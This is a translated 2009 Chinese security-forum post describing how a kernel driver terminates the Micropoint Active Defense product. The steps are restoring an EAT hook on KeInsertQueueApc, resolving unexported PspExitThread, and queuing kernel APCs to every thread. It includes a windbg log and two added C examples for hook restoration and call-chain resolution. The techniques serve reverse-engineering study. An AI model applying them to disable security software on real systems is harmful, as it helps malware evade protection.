微点交流论坛 (Micropoint Discussion Forum)

 

Author: 点饭的百度空间 (Silver member; points 2315, posts 2236, registered 2007-11-30)
Title: [dplayer] Playing with Micropoint: APCKILL

#1  [dplayer] Playing with Micropoint: APCKILL

Title: Playing with Micropoint: APCKILL
Author: dplayer
Time: 2009-09-08, 09:12
Link: http://bbs.pediy.com/showthread.php?t=97353


Recently I have been studying some APC-related material (ugh! so ancient that the gurus have probably forgotten it exists ~_~), and found that a special kernel APC can still get some things done, such as terminating a process (heh ^_^), at ring 0 of course. "Don't ask me what I can't do once I can load a driver, because I'm too damn **, pfft": some guru's words, and they apply to this post too! -_-
Choosing Micropoint for the experiment was no accident. Micropoint Active Defense is currently the heavy hitter among proactive-defense products; she is so X, truly HOOK without limits, and taking her down teaches a few XX tricks. It seems the ARK tools and process killers circulating online cannot terminate her directly. (If she were easy to knock over, maybe not so many people would play with her.. heh ^_^!)

Prerequisites: PE structure; the EPROCESS and ETHREAD structures and how to obtain them; APC basics (my study notes will be posted later; happy to discuss them with everyone).
Highlights: how to restore an EAT hook; how to use special kernel APCs; how to obtain the addresses of unexported kernel functions.
Basic flow:
1. Restore the EAT hook on KeInsertQueueApc;
2. Brute-force search for the Micropoint process, then enumerate all of its threads from that EPROCESS;
3. Use PsTerminateSystemThread to locate PspTerminateThreadByPointer, and from PspTerminateThreadByPointer locate PspExitThread; write an APC routine that directly calls the PspExitThread found this way -_-;
4. Call the restored KeInsertQueueApc to queue an APC to every Micropoint thread;
5. Load the driver and watch the latest free 90-day trial of Micropoint Active Defense disappear on XP SP2.

Note:
The code is messy, written as the thoughts came. If reading it makes you feel unwell, don't come looking for me! Normally the driver loads and Micropoint exits; if you get a BSOD or the like, don't come looking for me either!

Below is the windbg output after loading the driver on my machine:

baseadress:400000
the functionName = KeInsertQueueApc
the functionaddress=0x0040E411
   the functionrav =0x0000E411

the modulefullname is \WINDOWS\system32\ntoskrnl.exe
the database is 0x804D8000
the functionName = KeInsertQueueApc
the functionaddress=0xF9847B80
   the functionrav =0x7936FB80

the hook address at 0x7936fb80
the pkeinsertqueueapc is 0x804e6411
the keinsertqueueapc is 0xf9847b80
restore the hook address at 0x0000e411

the Thread is 0x81CEBAD0
the Thread 0x81cebad0 is Terminated.
the Thread is 0x81CFBAE0
the Thread 0x81cfbae0 is Terminated.
the Thread is 0x81D2E8E8
the Thread 0x81d2e8e8 is Terminated.
the Thread is 0x81C35DA8
the Thread 0x81c35da8 is Terminated.
the Thread is 0x81C14DA8
the Thread 0x81c14da8 is Terminated.

the Thread is 0x81E23B30
the Thread 0x81e23b30 is Terminated.

the Thread is 0x81E4D9E8
the Thread 0x81e4d9e8 is Terminated.
the Thread is 0x81E444E0
the Thread 0x81e444e0 is Terminated.
the Thread is 0x81E23770
the Thread 0x81e23770 is Terminated.
the Thread is 0x81E234F8
the Thread 0x81e234f8 is Terminated.
the Thread is 0x81DCA348
the Thread 0x81dca348 is Terminated.
the Thread is 0x81D93598
the Thread 0x81d93598 is Terminated.
the Thread is 0x81C6E020
the Thread 0x81c6e020 is Terminated.
the Thread is 0x81C6ED20
the Thread 0x81c6ed20 is Terminated.
the Thread is 0x81BB0020
the Thread 0x81bb0020 is Terminated.
the Thread is 0x81BB0320
the Thread 0x81bb0320 is Terminated.
the Thread is 0x81C6A020
the Thread 0x81c6a020 is Terminated.

the Thread is 0x81E41DA8
the Thread 0x81e41da8 is Terminated.
the Thread is 0x81E3F450
the Thread 0x81e3f450 is Terminated.
the Thread is 0x81E3EB38
the Thread 0x81e3eb38 is Terminated.
the Thread is 0x81E3E8C0
the Thread 0x81e3e8c0 is Terminated.
the Thread is 0x81E3E510
the Thread 0x81e3e510 is Terminated.
the Thread is 0x81E3DB38
the Thread 0x81e3db38 is Terminated.
the Thread is 0x81E3D8C0
the Thread 0x81e3d8c0 is Terminated.
the Thread is 0x81E3D648
the Thread 0x81e3d648 is Terminated.
the Thread is 0x81E3A258
the Thread 0x81e3a258 is Terminated.
the Thread is 0x81E39020
the Thread 0x81e39020 is Terminated.
the Thread is 0x81E39DA8
the Thread 0x81e39da8 is Terminated.
the Thread is 0x81E39AD0
the Thread 0x81e39ad0 is Terminated.
the Thread is 0x81E38020
the Thread 0x81e38020 is Terminated.
the Thread is 0x81E383A0
the Thread 0x81e383a0 is Terminated.
the Thread is 0x81E37020
the Thread 0x81e37020 is Terminated.
the Thread is 0x81E37DA8
the Thread 0x81e37da8 is Terminated.
the Thread is 0x81E36C08
the Thread 0x81e36c08 is Terminated.
the Thread is 0x81E364D8
the Thread 0x81e364d8 is Terminated.
the Thread is 0x81E355B0
the Thread 0x81e355b0 is Terminated.
the Thread is 0x81E2C020
the Thread 0x81e2c020 is Terminated.
the Thread is 0x81E2CD88
the Thread 0x81e2cd88 is Terminated.
the Thread is 0x81E2C918
the Thread 0x81e2c918 is Terminated.
the Thread is 0x81E23020
the Thread 0x81e23020 is Terminated.
the Thread is 0x81E23DA8
the Thread 0x81e23da8 is Terminated.
the Thread is 0x81E18560
the Thread 0x81e18560 is Terminated.
the Thread is 0x81D91950
the Thread 0x81d91950 is Terminated.
the Thread is 0x81D6C020
the Thread 0x81d6c020 is Terminated.
the Thread is 0x81D5BDA8
the Thread 0x81d5bda8 is Terminated.

2009-9-21 20:03
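Step 1 of the flow above, and the first part of the windbg log, is an EAT hook being undone: the export slot for KeInsertQueueApc in the live kernel held 0x7936FB80 (that is 0xF9847B80 - 0x804D8000, far beyond any plausible SizeOfImage), and the driver wrote back the on-disk RVA 0xE411 so the export resolved to 0x804E6411 again. The following is an added example, not dplayer's driver code, showing that check and restoration in plain C. The "live" and "on-disk" images are tiny constructed PE32 buffers laid out as if loaded (RVA equals buffer offset), so it compiles in user mode; a real driver maps the actual ntoskrnl.exe from disk and has to translate RVAs to file offsets through the section headers. The export names other than KeInsertQueueApc and all RVAs except 0xE411 are made up.

```c
/* Added example: detect and undo an Export Address Table (EAT) hook.
 * Hypothetical and self-contained; images are constructed PE32 buffers. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* PE32 field offsets used below; every other header field stays zero. */
#define E_LFANEW           0x3C  /* DOS header: offset of the NT headers      */
#define NT_SIZEOFIMAGE     0x50  /* 4 (signature) + 20 (file header) + 56     */
#define NT_EXPORT_DIR_RVA  0x78  /* 4 + 20 + 96: DataDirectory[0].VirtualAddress */
#define ED_NUMBER_OF_FUNCS 0x14  /* IMAGE_EXPORT_DIRECTORY fields             */
#define ED_NUMBER_OF_NAMES 0x18
#define ED_ADDR_FUNCTIONS  0x1C
#define ED_ADDR_NAMES      0x20
#define ED_ADDR_ORDINALS   0x24

/* Layout of the constructed image: only headers and export tables are populated.
 * SIZE_OF_IMAGE is the header value the hook check compares against, not the
 * buffer size. KERNEL_BASE is the ntoskrnl base quoted in the post's log. */
#define BUF_SIZE      0x1000
#define SIZE_OF_IMAGE 0x200000u
#define OFF_NT        0x80
#define OFF_EXPORT    0x200
#define OFF_FUNCS     0x300
#define OFF_NAMES     0x340
#define OFF_ORDS      0x380
#define OFF_STRINGS   0x400
#define KERNEL_BASE   0x804D8000u

static uint32_t rd32(const uint8_t *p, uint32_t off) { uint32_t v; memcpy(&v, p + off, 4); return v; }
static uint16_t rd16(const uint8_t *p, uint32_t off) { uint16_t v; memcpy(&v, p + off, 2); return v; }
static void wr32(uint8_t *p, uint32_t off, uint32_t v) { memcpy(p + off, &v, 4); }
static void wr16(uint8_t *p, uint32_t off, uint16_t v) { memcpy(p + off, &v, 2); }

/* Build a minimal PE32 image exporting the given names at the given RVAs. */
static void build_image(uint8_t *img, const char **names, const uint32_t *rvas, uint32_t n) {
    uint32_t str = OFF_STRINGS, i;
    memset(img, 0, BUF_SIZE);
    wr16(img, 0, 0x5A4D);                               /* "MZ"                      */
    wr32(img, E_LFANEW, OFF_NT);
    wr32(img, OFF_NT, 0x00004550);                      /* "PE\0\0"                  */
    wr16(img, OFF_NT + 0x18, 0x10B);                    /* OptionalHeader.Magic PE32 */
    wr32(img, OFF_NT + NT_SIZEOFIMAGE, SIZE_OF_IMAGE);
    wr32(img, OFF_NT + NT_EXPORT_DIR_RVA, OFF_EXPORT);
    wr32(img, OFF_EXPORT + ED_NUMBER_OF_FUNCS, n);
    wr32(img, OFF_EXPORT + ED_NUMBER_OF_NAMES, n);
    wr32(img, OFF_EXPORT + ED_ADDR_FUNCTIONS, OFF_FUNCS);
    wr32(img, OFF_EXPORT + ED_ADDR_NAMES, OFF_NAMES);
    wr32(img, OFF_EXPORT + ED_ADDR_ORDINALS, OFF_ORDS);
    for (i = 0; i < n; i++) {
        wr32(img, OFF_FUNCS + 4 * i, rvas[i]);
        wr32(img, OFF_NAMES + 4 * i, str);
        wr16(img, OFF_ORDS + 2 * i, (uint16_t)i);
        strcpy((char *)img + str, names[i]);
        str += (uint32_t)strlen(names[i]) + 1;
    }
}

/* RVA of the AddressOfFunctions slot for a named export, 0 if not exported.
 * Linear scan; the real loader binary-searches the sorted name table. */
static uint32_t export_slot_rva(const uint8_t *img, const char *name) {
    uint32_t nt = rd32(img, E_LFANEW), ed = rd32(img, nt + NT_EXPORT_DIR_RVA);
    uint32_t count = rd32(img, ed + ED_NUMBER_OF_NAMES), i;
    uint32_t funcs = rd32(img, ed + ED_ADDR_FUNCTIONS), names = rd32(img, ed + ED_ADDR_NAMES),
             ords  = rd32(img, ed + ED_ADDR_ORDINALS);
    for (i = 0; i < count; i++)
        if (strcmp((const char *)img + rd32(img, names + 4 * i), name) == 0)
            return funcs + 4u * rd16(img, ords + 2 * i);
    return 0;
}

/* An EAT hook overwrites the slot with (hook_address - image_base). When the hook
 * lives in another driver that value exceeds SizeOfImage, which is the tell. */
static int eat_slot_hooked(const uint8_t *img, uint32_t slot_rva) {
    uint32_t nt = rd32(img, E_LFANEW);
    return slot_rva != 0 && rd32(img, slot_rva) >= rd32(img, nt + NT_SIZEOFIMAGE);
}

/* Write the clean RVA from the on-disk image back into the live slot. Returns the
 * resolved address (base + RVA) after restoration, or 0 if the export is missing. */
static uint32_t restore_export(uint8_t *live, const uint8_t *disk, uint32_t base,
                               const char *name, uint32_t *old_rva) {
    uint32_t ls = export_slot_rva(live, name), ds = export_slot_rva(disk, name);
    if (!ls || !ds) return 0;
    if (old_rva) *old_rva = rd32(live, ls);
    wr32(live, ls, rd32(disk, ds));
    return base + rd32(live, ls);
}

static uint8_t g_disk[BUF_SIZE], g_live[BUF_SIZE];
static int g_was_hooked;   /* size check result before restoration */
static uint32_t g_old_rva; /* value found in the hooked slot        */

/* Scenario mirroring the log: clean RVA 0xE411 is from the post, the other
 * exports and RVAs are made up; a hook at 0xF9847B80 has rewritten the slot. */
static uint32_t demo_restore_keinsertqueueapc(void) {
    const char *names[] = { "KeInsertQueueApc", "KeInitializeApc", "PsTerminateSystemThread" };
    const uint32_t rvas[] = { 0xE411, 0xE2A0, 0x8F6C0 };
    uint32_t slot;
    build_image(g_disk, names, rvas, 3);
    build_image(g_live, names, rvas, 3);
    slot = export_slot_rva(g_live, "KeInsertQueueApc");
    wr32(g_live, slot, 0xF9847B80u - KERNEL_BASE);     /* simulate the hook */
    g_was_hooked = eat_slot_hooked(g_live, slot);
    return restore_export(g_live, g_disk, KERNEL_BASE, "KeInsertQueueApc", &g_old_rva);
}

int main(void) {
    uint32_t addr = demo_restore_keinsertqueueapc();
    printf("hooked before: %d, old slot value: 0x%08X, restored: 0x%08X\n",
           g_was_hooked, g_old_rva, addr);
    return 0;
}
```

The size comparison is only a quick tell; a hook that redirects to a cave inside ntoskrnl itself would pass it, which is why restore_export always trusts the on-disk copy rather than the check. Writing into the kernel's export table in a real driver also requires disabling write protection (or mapping the page writable), which the example leaves out.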
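Step 3 of the flow (finding the unexported PspExitThread by starting from the exported PsTerminateSystemThread and walking through PspTerminateThreadByPointer) is a call-chain walk over x86 code. The following is an added example, not dplayer's code, that does that walk over a constructed code image: it scans each function for a CALL rel32 (opcode E8), computes the target and follows it. The three routine RVAs and the instruction bytes are made up, and the real ntoskrnl functions are longer and do not necessarily call the next routine first, so a real tool needs a byte pattern or a length disassembler for the specific build; the example keeps only a sanity filter that rejects E8 bytes whose computed target falls outside the image.

```c
/* Added example: resolve an unexported routine by following CALL rel32 from an
 * exported one. Hypothetical; the code image and RVAs are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CODE_SIZE 0x4000
#define RVA_PS_TERMINATE_SYSTEM_THREAD      0x1000  /* constructed stand-ins for */
#define RVA_PSP_TERMINATE_THREAD_BY_POINTER 0x2000  /* the real ntoskrnl RVAs    */
#define RVA_PSP_EXIT_THREAD                 0x3000

static uint8_t g_code[CODE_SIZE];

static int32_t rd32s(const uint8_t *p) { int32_t v; memcpy(&v, p, 4); return v; }
static void wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Emit "E8 rel32" at `at`; rel32 is relative to the instruction that follows. */
static void emit_call(uint32_t at, uint32_t target) {
    g_code[at] = 0xE8;
    wr32(g_code + at + 1, target - (at + 5));
}

/* Build the constructed code image: three small stdcall-style functions. */
static void build_code(void) {
    static const uint8_t prologue[]  = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC };  /* mov edi,edi; push ebp; mov ebp,esp */
    static const uint8_t push_arg[]  = { 0xFF, 0x75, 0x08 };              /* push [ebp+8]                       */
    static const uint8_t push_1000[] = { 0x68, 0xE8, 0x03, 0x00, 0x00 };  /* push 0x3E8: carries a stray E8 byte */
    static const uint8_t ret4[]      = { 0x5D, 0xC2, 0x04, 0x00 };        /* pop ebp; ret 4                     */
    uint32_t a = RVA_PS_TERMINATE_SYSTEM_THREAD, b = RVA_PSP_TERMINATE_THREAD_BY_POINTER;
    memset(g_code, 0xCC, CODE_SIZE);                                      /* int3 padding */
    memcpy(g_code + a, prologue, 5);
    memcpy(g_code + a + 5, push_arg, 3);
    emit_call(a + 8, RVA_PSP_TERMINATE_THREAD_BY_POINTER);
    memcpy(g_code + a + 13, ret4, 4);
    memcpy(g_code + b, prologue, 5);
    memcpy(g_code + b + 5, push_1000, 5);
    emit_call(b + 10, RVA_PSP_EXIT_THREAD);
    memcpy(g_code + b + 15, ret4, 4);
    memcpy(g_code + RVA_PSP_EXIT_THREAD, prologue, 5);
}

/* RVA of the first plausible CALL rel32 target within `window` bytes of `func`,
 * or 0 if none. An E8 inside an immediate (push_1000 above) is rejected because
 * its computed target lands outside the image; this filter is not a substitute
 * for proper instruction decoding. */
static uint32_t first_call_target(const uint8_t *code, uint32_t size, uint32_t func, uint32_t window) {
    uint32_t off;
    for (off = func; off + 5 <= func + window && off + 5 <= size; off++) {
        uint32_t target;
        if (code[off] != 0xE8) continue;
        target = off + 5 + (uint32_t)rd32s(code + off + 1);
        if (target < size) return target;
    }
    return 0;
}

/* Follow `depth` successive calls from `start`; 0 if the chain breaks early. */
static uint32_t follow_call_chain(const uint8_t *code, uint32_t size, uint32_t start,
                                  uint32_t window, unsigned depth) {
    uint32_t cur = start;
    while (depth-- && cur) cur = first_call_target(code, size, cur, window);
    return cur;
}

/* PsTerminateSystemThread -> PspTerminateThreadByPointer -> PspExitThread */
static uint32_t demo_find_pspexitthread(void) {
    build_code();
    return follow_call_chain(g_code, CODE_SIZE, RVA_PS_TERMINATE_SYSTEM_THREAD, 0x40, 2);
}

int main(void) {
    printf("PspExitThread RVA: 0x%08X\n", demo_find_pspexitthread());
    return 0;
}
```

In a driver the image base and the exported start address come from the kernel module list and MmGetSystemRoutineAddress (or the export table, once unhooked), and the resolved RVA is added to the kernel base; the chain walk itself is what the post's step 3 relies on.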
qqwangtao (Intermediate user; points 456, posts 454, registered 2009-6-17; from the revolutionary holy land, Yan'an)
#2

You say XP SP2, but what about XP SP3? And Vista and Win7? It seems most of today's viruses and exploits target XP!

2009-9-21 22:00